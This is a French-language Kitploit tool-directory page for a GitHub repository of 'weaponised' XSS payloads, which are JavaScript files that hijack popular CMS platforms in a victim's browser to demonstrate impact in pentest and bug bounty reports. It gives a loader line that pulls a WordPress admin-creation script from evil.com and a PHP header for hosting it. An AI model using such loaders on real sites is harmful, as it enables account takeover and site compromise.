Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
weaponised-XSS-payloads — XSS payloads designed to turn alert(1) into P1 | Kitploit
Outils/GitHubGitHub/hakluke/weaponised-xss-payloads
Payload GenerationExploitationWeb Application ExploitationWeb SecurityPenetration TestingPayload Development
GitHubhakluke/weaponised-xss-payloads

weaponised-XSS-payloads

XSS payloads designed to turn alert(1) into P1

Voir le dépôt
1.4k222il y a 2 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Payloads XSS armés

Des payloads XSS conçus pour transformer alert(1) en P1.

L'article de blog

Ce dépôt a été publié en même temps qu'un article de blog intitulé « How to Upgrade Your XSS Bugs from Medium to Critical » https://medium.com/@hakluke/upgrade-xss-from-medium-to-critical-cb96597b6cc4

Qu'est-ce que c'est ?

Dans ce dépôt, vous trouverez un ensemble de fichiers JavaScript qui peuvent être chargés dans un payload XSS afin d'effectuer des fonctions sensibles sur les plateformes CMS populaires dans le contexte du navigateur de la victime. Cela peut aider à transformer un simple bug XSS en quelque chose de plus critique, comme une prise de contrôle de compte.

C'est parfait pour renforcer la sévérité d'un rapport de pentest ou de bug bounty en démontrant un impact de sécurité réel.

Les payloads sont ajoutés progressivement, au fil de mon temps libre. Il y en a beaucoup d'autres à venir. Si vous pouvez aider, les pull requests sont les bienvenues ! Si vous cherchez de l'inspiration pour savoir quoi créer, consultez l'onglet « issues » de ce dépôt.

Comment faire

La façon la plus simple d'utiliser ces payloads est de les héberger quelque part et de les charger dans l'attribut src d'une balise script pour votre payload XSS, comme ceci :

root@kitploit:~
<script src="http://evil.com/wordpress_create_admin_user.js"></script>

Alternativement, selon le contexte et la longueur du payload, il peut parfois être minifié, encodé puis intégré directement dans la requête.

Afin d'héberger le fichier JavaScript, vous devrez peut-être définir le Content-Type sur application/javascript. Pour ce faire avec PHP, vous pouvez simplement ajouter cette ligne en haut de n'importe quel payload, l'enregistrer sous forme de fichier .php et l'héberger sur votre serveur web compatible PHP :

root@kitploit:~
<?php header("Content-Type: application/javascript"); ?>

Crédits

Cet article de Shift8 est ce qui m'a inspiré à créer ce dépôt. Le JS de l'article contient quelques fautes de frappe mineures, mais les concepts sont tout à fait justes.

Télécharger l’outil